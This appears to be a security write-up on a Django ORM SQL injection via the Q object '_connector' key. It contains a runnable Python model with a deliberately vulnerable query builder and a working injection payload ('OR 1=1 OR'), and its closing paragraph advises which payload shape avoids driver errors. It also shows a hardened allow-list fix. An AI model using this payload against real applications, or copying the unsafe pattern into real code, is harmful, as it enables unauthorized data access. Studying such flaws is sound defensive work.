
Summary

I discovered a critical SQL injection vulnerability in the Django ORM's handling of Q objects (CVE-2025-64459). The internal WhereNode.as_sql method uses unsafe string formatting (%s) to inject the query connector (e.g., 'AND', 'OR') into the raw SQL query. An attacker can control this connector value via the _connector key when a Q object is…
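The pattern described above, reduced to a runnable model, as an added example that is not Django's code and not the report's own proof of concept: a simplified Q-like builder whose `as_sql` splices the connector into the WHERE clause with `"%s"` formatting, driven by a hypothetical view (`filter_users`) that expands untrusted query-string parameters straight into `Q(**params)`. The `users` table, its rows, `LEGIT_PARAMS` and `ATTACK_PARAMS` are constructed for the demonstration. The allow-list check in `as_sql_hardened` is the general mitigation for this bug class, not Django's exact patch.

```python
"""Model of an attacker-controlled SQL connector (simplified stand-in, not django.db.models)."""
import sqlite3

VALID_CONNECTORS = {"AND", "OR"}


class Q:
    """Q-like node: keyword lookups become `column = value` children, and the
    `_connector` keyword chooses how they are joined. When the kwargs come from
    untrusted input, `_connector` is the attacker's foothold."""

    def __init__(self, _connector=None, **lookups):
        self.children = sorted(lookups.items())
        self.connector = _connector or "AND"


def as_sql_vulnerable(q):
    """Unsafe pattern: lookup values are parameterized, but the connector is
    string-formatted into the SQL text and joined between the children."""
    sql_parts, params = [], []
    for column, value in q.children:
        sql_parts.append(f'"{column}" = %s')  # value goes through a placeholder
        params.append(value)
    conn = " %s " % q.connector  # connector is trusted verbatim: the injection point
    return "(" + conn.join(sql_parts) + ")", params


def as_sql_hardened(q):
    """Same builder, but the connector must be one of a fixed set of keywords
    before it is allowed anywhere near the SQL text (general mitigation)."""
    if q.connector not in VALID_CONNECTORS:
        raise ValueError(f"invalid connector: {q.connector!r}")
    return as_sql_vulnerable(q)  # safe once the connector is known-good


def run_where(where_sql, params):
    """Execute the generated WHERE clause against a constructed in-memory table.
    sqlite3 uses '?' placeholders, so '%s' is translated before execution."""
    con = sqlite3.connect(":memory:")
    con.execute('CREATE TABLE users ("name" TEXT, "is_active" INTEGER)')
    con.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", 1), ("bob", 0), ("carol", 1)],  # constructed sample rows
    )
    rows = con.execute(
        "SELECT name FROM users WHERE " + where_sql.replace("%s", "?"), params
    ).fetchall()
    con.close()
    return [r[0] for r in rows]


def filter_users(request_params, as_sql=as_sql_vulnerable):
    """Hypothetical view: expands query-string parameters directly into Q(**...).
    This is the application-side mistake the attacker needs."""
    where_sql, params = as_sql(Q(**request_params))
    return run_where(where_sql, params)


def hardened_rejects(request_params):
    """True if the hardened builder refuses the request outright."""
    try:
        filter_users(request_params, as_sql_hardened)
    except ValueError:
        return True
    return False


# Constructed inputs: what a normal client sends, and what an attacker sends.
# The attack keeps the placeholder count intact, so the driver raises no error;
# the extra "OR 1=1" simply makes the whole clause true.
LEGIT_PARAMS = {"name": "alice", "is_active": "1"}
ATTACK_PARAMS = {"name": "alice", "is_active": "1", "_connector": "OR 1=1 OR"}

if __name__ == "__main__":
    print("legit SQL  :", as_sql_vulnerable(Q(**LEGIT_PARAMS))[0])
    print("legit rows :", filter_users(LEGIT_PARAMS))
    print("attack SQL :", as_sql_vulnerable(Q(**ATTACK_PARAMS))[0])
    print("attack rows:", filter_users(ATTACK_PARAMS))
    print("hardened   :", "rejected" if hardened_rejects(ATTACK_PARAMS) else "accepted")
```

Two details matter when assessing exposure. The connector is only used to join children, so a request carrying a single lookup never reaches the injection point; the attacker needs at least two lookups in the same Q. And the values themselves remain parameterized throughout, which is why a payload like `OR 1=1 OR` that keeps the placeholder count balanced is preferable to a comment-based truncation, which would leave unused parameters and trip a driver error.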